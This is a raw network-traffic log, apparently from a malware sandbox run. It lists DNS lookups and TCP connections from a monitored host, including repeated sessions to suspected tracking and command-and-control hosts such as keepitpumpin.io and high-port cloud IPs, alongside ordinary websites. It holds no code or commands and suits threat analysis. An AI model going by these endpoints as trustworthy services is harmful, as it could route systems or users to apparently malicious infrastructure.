US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 ssl.xdisctracking.pw udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.59.88:443 ssl.xdisctracking.pw tcp
US 104.21.59.88:443 ssl.xdisctracking.pw tcp
US 8.8.8.8:53 www.freevpn.win udp
US 172.67.185.200:443 www.freevpn.win tcp
US 172.67.185.200:443 www.freevpn.win tcp
US 172.67.185.200:443 www.freevpn.win tcp
US 172.67.185.200:443 www.freevpn.win tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 track.xdisctracking.pw udp
US 34.196.146.107:443 track.xdisctracking.pw tcp
US 34.196.146.107:443 track.xdisctracking.pw tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 134.209.221.45:18389 tcp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 104.248.53.62:49141 tcp
US 157.230.215.30:12157 tcp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 157.230.231.217:32835 tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.livechatinc.com udp
NL 104.110.191.35:443 api.livechatinc.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.livechatinc.com udp
US 8.8.8.8:53 api.livechatinc.com udp
US 8.8.8.8:53 accounts.livechatinc.com udp
NL 104.110.191.6:443 accounts.livechatinc.com tcp
NL 104.110.191.6:443 accounts.livechatinc.com tcp
NL 104.110.191.6:443 accounts.livechatinc.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 172.217.168.226:443 googleads.g.doubleclick.net tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 tattle.api.osano.com udp
US 34.231.157.89:443 tattle.api.osano.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 bam.nr-data.net udp
US 162.247.242.19:443 bam.nr-data.net tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 secure.livechatinc.com udp
NL 104.110.191.35:443 secure.livechatinc.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.livechatinc.com udp
NL 104.110.191.6:443 api.livechatinc.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 rs.fullstory.com udp
US 35.186.194.58:443 rs.fullstory.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 services.addons.mozilla.org udp
US 34.218.7.136:443 services.addons.mozilla.org tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 versioncheck-bg.addons.mozilla.org udp
NL 65.9.83.115:443 versioncheck-bg.addons.mozilla.org tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 versioncheck-bg.addons.mozilla.org udp
US 8.8.8.8:53 versioncheck-bg.addons.mozilla.org udp
NL 65.9.83.30:443 versioncheck-bg.addons.mozilla.org tcp
NL 65.9.83.4:443 versioncheck-bg.addons.mozilla.org tcp
NL 65.9.83.115:443 versioncheck-bg.addons.mozilla.org tcp
US 8.8.8.8:53 versioncheck-bg.addons.mozilla.org udp
NL 65.9.83.4:443 versioncheck-bg.addons.mozilla.org tcp
US 8.8.8.8:53 versioncheck-bg.addons.mozilla.org udp
NL 65.9.83.4:443 versioncheck-bg.addons.mozilla.org tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 www.bhphotovideo.com udp
US 104.18.25.211:443 www.bhphotovideo.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 assets.emarsys.net udp
NL 65.9.83.96:443 assets.emarsys.net tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 216.58.208.106:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 www.directdexchange.com udp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.215.30:12157 tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.42:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 157.230.215.30:12157 tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.215.30:12157 tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.215.30:12157 tcp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 8.8.8.8:53 fernandomayol.com udp
DO 186.7.66.204:80 fernandomayol.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 www.provideoinstruments.com udp
US 172.67.10.155:443 www.provideoinstruments.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 js.hsforms.net udp
US 104.17.182.73:443 js.hsforms.net tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 104.18.10.207:443 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 ajax.cloudflare.com udp
US 104.16.168.35:443 ajax.cloudflare.com tcp
US 8.8.8.8:53 translate.google.com udp
US 142.251.36.14:443 translate.google.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 143.244.170.137:23872 tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 translate.googleapis.com udp
NL 142.250.179.138:443 translate.googleapis.com tcp
US 8.8.8.8:53 cdn1.affirm.com udp
US 151.101.194.133:443 cdn1.affirm.com tcp
US 8.8.8.8:53 translate.googleapis.com udp
NL 142.250.179.138:443 translate.googleapis.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 rec.smartlook.com udp
NL 185.59.222.18:443 rec.smartlook.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 chatserver.comm100.com udp
NL 65.9.83.83:443 chatserver.comm100.com tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 forms.hsforms.com udp
US 8.8.8.8:53 cdn.inspectlet.com udp
US 104.16.86.5:443 forms.hsforms.com tcp
US 104.22.56.245:443 cdn.inspectlet.com tcp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 js.hs-scripts.com udp
US 104.17.213.204:443 js.hs-scripts.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 www.affirm.com udp
US 8.8.8.8:53 js.usemessages.com udp
US 8.8.8.8:53 api-cf.affirm.com udp
US 8.8.8.8:53 hn.inspectlet.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 js.hs-analytics.net udp
US 142.251.36.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 api-cf.affirm.com udp
US 8.8.8.8:53 api-cf.affirm.com udp
US 8.8.8.8:53 js.hscollectedforms.net udp
NL 65.9.83.102:443 api-cf.affirm.com tcp
US 8.8.8.8:53 js.hsadspixel.net udp
US 104.17.238.204:443 js.usemessages.com tcp
US 172.217.168.230:443 static.doubleclick.net tcp
US 104.22.57.245:443 hn.inspectlet.com tcp
US 8.8.8.8:53 www.affirm.com udp
US 8.8.8.8:53 api-cf.affirm.com udp
US 8.8.8.8:53 vue.comm100.com udp
NL 65.9.83.102:443 api-cf.affirm.com tcp
NL 65.9.83.78:443 www.affirm.com tcp
US 8.8.8.8:53 js.hs-banner.com udp
US 8.8.8.8:53 api-cf.affirm.com udp
US 104.17.69.176:443 js.hs-analytics.net tcp
US 8.8.8.8:53 api-cf.affirm.com udp
NL 65.9.83.19:443 api-cf.affirm.com tcp
US 104.17.130.171:443 js.hscollectedforms.net tcp
US 104.17.114.176:443 js.hsadspixel.net tcp
NL 65.9.83.102:443 api-cf.affirm.com tcp
US 104.18.20.191:443 js.hs-banner.com tcp
NL 65.9.83.40:443 vue.comm100.com tcp
NL 65.9.83.102:443 api-cf.affirm.com tcp
NL 65.9.83.125:443 www.affirm.com tcp
NL 65.9.83.102:443 api-cf.affirm.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.hubspot.com udp
US 104.19.154.83:443 api.hubspot.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 forms.hubspot.com udp
US 104.19.154.83:443 forms.hubspot.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 app.hubspot.com udp
US 104.19.155.83:443 app.hubspot.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 app.hubspot.com udp
US 104.19.155.83:443 app.hubspot.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.6.210:443 static.hsappstatic.net tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 static.hsappstatic.net udp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.9.210:443 static.hsappstatic.net tcp
US 104.17.7.210:443 static.hsappstatic.net tcp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.5.210:443 static.hsappstatic.net tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 hostedmax.comm100.com udp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.5.210:443 static.hsappstatic.net tcp
NL 65.9.83.28:443 hostedmax.comm100.com tcp
US 8.8.8.8:53 static.hsappstatic.net udp
US 104.17.5.210:443 static.hsappstatic.net tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 standby.comm100vue.com udp
NL 65.9.83.50:443 standby.comm100vue.com tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.hubapi.com udp
US 104.17.203.204:443 api.hubapi.com tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
US 134.209.213.209:15714 tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 udp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.237.151:10541 tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 143.244.170.137:23872 tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 143.244.170.137:32707 tcp
US 134.209.120.191:40447 tcp
